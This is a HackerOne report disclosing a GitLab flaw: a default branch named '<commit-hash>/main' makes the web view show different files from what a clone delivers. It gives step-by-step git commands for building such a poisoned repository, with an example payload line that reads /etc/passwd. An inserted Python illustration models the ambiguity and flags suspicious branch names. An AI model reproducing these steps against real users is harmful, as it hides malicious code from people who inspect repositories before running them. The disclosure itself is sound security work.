The main branch of a repository with a specially designed name allows an attacker to create repositories with malicious code.
**[HackerOne report #1864278](https://hackerone.com/reports/1864278)** by `st4nly0n` on 2023-02-06, assigned to `GitLab Team`: [Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce)

## Report

Description:
==================

The main branch of a repository with a specially crafted name allows an attacker to create repositories with malicious code; victims who clone or download these repositories will execute arbitrary code on their systems.

When the main branch of a repository has the name `<commit-hash>/<directory>`, for example `3038cd56e64b952a122215b4bef05814d7a25182/main`, the GitLab web interface will not display the files belonging to **HEAD**; instead, it displays the contents of the files within the `main` directory that belong to commit `3038cd56e64b952a122215b4bef05814d7a25182`. In this state the GitLab web interface is not able to show the actual content of the files: the web interface will always show the content of the files in commit `3038cd56e64b952a122215b4bef05814d7a25182`, whereas when downloading the repository from the web interface or cloning via **CLI**, the victim gets the content of the files from **HEAD**.

Steps To Reproduce:
==================

- *The following steps must be performed as the attacker user*

**1.** Create a public repository *(Initialize README.md)*.

**2.** Unprotect the `main` branch.

**3.** Clone and enter the repository:

```bash
git clone <repo>
cd <repo>
```

**4.** Create a `hello.sh` file with harmless code:

```bash
echo "echo 'hello world'" > hello.sh
```

**5.** Create a directory named `main`:

```bash
mkdir main
```

**6.** Copy the `README.md` and `hello.sh` files to the `main` directory:

```bash
cp README.md main/ && cp hello.sh main/
```

**7.** Delete the git history:

```bash
git update-ref -d HEAD
```

**8.** Commit the changes and push to the remote:

```bash
git add .
git commit -m 'Init'
git push origin HEAD -f
```

**9.** Create a **shell variable** with the date of the last commit:

```bash
GIT_COMMITTER_DATE=$(git show -s --format=%cd $(git rev-parse HEAD))
```

**10.** Create a branch with the format `<last-commit-hash>/<main>`:

```bash
git checkout -b "$(git rev-parse HEAD)/main"
```

**11.** Push the branch to the remote:

```bash
git push origin HEAD -f
```

**12.** From the web interface, change the default branch to the `<last-commit-hash>/<main>` branch created earlier.

**13.** Remove the `main` branch:

```bash
git push origin -d main
```

**14.** Remove the `main` directory from the `<last-commit-hash>/<main>` branch:

```bash
rm -rf main/
```

**15.** Change the content of `hello.sh` to the **payload** of your choice:

```bash
### EXAMPLE:
echo 'cat /etc/passwd' > hello.sh
```

**16.** Delete the git history:

```bash
git update-ref -d HEAD
```

**17.** Commit the changes with the saved date and push to the remote:

```bash
git add .
git commit -m 'Init' --date "$GIT_COMMITTER_DATE"
git push origin HEAD -f
```

As a result of this behavior, the proof-of-concept video shows the victim viewing the repository through the GitLab web interface, where the `hello.sh` file does not appear to pose a security risk; however, once the victim downloads or clones the repository and executes the `hello.sh` file, it runs an unexpected command.

**PoC Video**

![poc.mp4](https://h1.sec.gitlab.net/a/cd7f4f19-abd6-439c-9ba9-efc0e80d325e/poc.mp4)

What is the current *bug* behavior?
===========================

The web interface does not guarantee file integrity when the main branch has a specially crafted name. This allows an attacker to create repositories with poisoned content.

What is the expected *correct* behavior?
===========================

The files in the main branch of a repository that are displayed through the GitLab web interface must be the same as the ones you get when downloading or cloning the repository.
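The root of the mismatch described above is that a tree URL of the form `<ref>/<path>` is ambiguous once a branch is named `<commit-hash>/<directory>`: the same string can be read as commit `<hash>` with path `<directory>`, or as branch `<hash>/<directory>` with an empty path. The following Python block is an added illustration, not code from the report or from GitLab; it models the two resolution strategies (the names `resolve_sha_first`, `resolve_longest_ref` and the `SAMPLE_BRANCHES` list are constructed for this example) and includes a simple audit helper that flags branch names whose leading segment is a full commit id, which is the shape a reviewer would want to catch.

```python
import re

# A full Git object id: 40 lowercase hex digits (SHA-1).
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")

# Constructed sample: branch names as they might exist in a project. The first
# one has the shape from the report (<commit-hash>/<directory>).
SAMPLE_BRANCHES = [
    "3038cd56e64b952a122215b4bef05814d7a25182/main",
    "main",
    "feature/login-page",
]


def is_sha_shadowing_branch(name: str) -> bool:
    """True when the first path segment of a branch name is a full commit id.

    Such a name makes a '<ref>/<path>' URL ambiguous: it can be read as
    (commit <sha>, path <rest>) or as (branch '<sha>/<rest>', path '').
    """
    first, sep, _rest = name.partition("/")
    return bool(sep) and FULL_SHA.match(first) is not None


def flag_ambiguous_branches(branches):
    """Return the branch names an auditor should look at, sorted."""
    return sorted(b for b in branches if is_sha_shadowing_branch(b))


def resolve_longest_ref(ref_path: str, branches):
    """Prefer the longest known ref that is a prefix of the URL path.

    A branch literally named '<sha>/main' therefore wins over commit '<sha>'
    with path 'main', so the view shows the same tree a clone would get.
    Returns (kind, ref, path) or None.
    """
    for branch in sorted(branches, key=len, reverse=True):
        if ref_path == branch:
            return ("branch", branch, "")
        if ref_path.startswith(branch + "/"):
            return ("branch", branch, ref_path[len(branch) + 1:])
    first, _sep, rest = ref_path.partition("/")
    if FULL_SHA.match(first):
        return ("commit", first, rest)
    return None


def resolve_sha_first(ref_path: str, branches):
    """Trust a leading full SHA before consulting branch names.

    This models the misbehaviour the report describes (an assumption about
    the shape of the bug, not GitLab's actual code): the view lands on the
    commit's 'main' directory instead of the default branch's HEAD.
    """
    first, _sep, rest = ref_path.partition("/")
    if FULL_SHA.match(first):
        return ("commit", first, rest)
    return resolve_longest_ref(ref_path, branches)


if __name__ == "__main__":
    target = "3038cd56e64b952a122215b4bef05814d7a25182/main"
    print("flagged:", flag_ambiguous_branches(SAMPLE_BRANCHES))
    print("sha-first:", resolve_sha_first(target, SAMPLE_BRANCHES))
    print("longest-ref:", resolve_longest_ref(target, SAMPLE_BRANCHES))
```

Run against the sample list, the audit helper flags only the `<hash>/main` branch; `resolve_sha_first` returns the commit plus a `main` path (the tree the report says the UI rendered), while `resolve_longest_ref` returns the branch itself with an empty path, matching what `git clone` checks out.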
Output of checks
===========================

This bug happens on GitLab.com

#### Impact

An attacker can get a victim to execute unexpected arbitrary commands on their system if the victim clones and executes files from a repository that initially does not appear to pose a security risk. For the proof of concept the victim executed the calculator on their system; however, using what is described in this report, an attacker would aim to take control of the victim's system or obtain confidential information. This attack impacts the availability, integrity and confidentiality of the affected user.

## Attachments

**Warning:** Attachments received through HackerOne, please exercise caution!

* [poc.mp4](https://h1.sec.gitlab.net/a/cd7f4f19-abd6-439c-9ba9-efc0e80d325e/poc.mp4)

## How To Reproduce

Please add [reproducibility information] to this section:

1.
1.
1.

[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues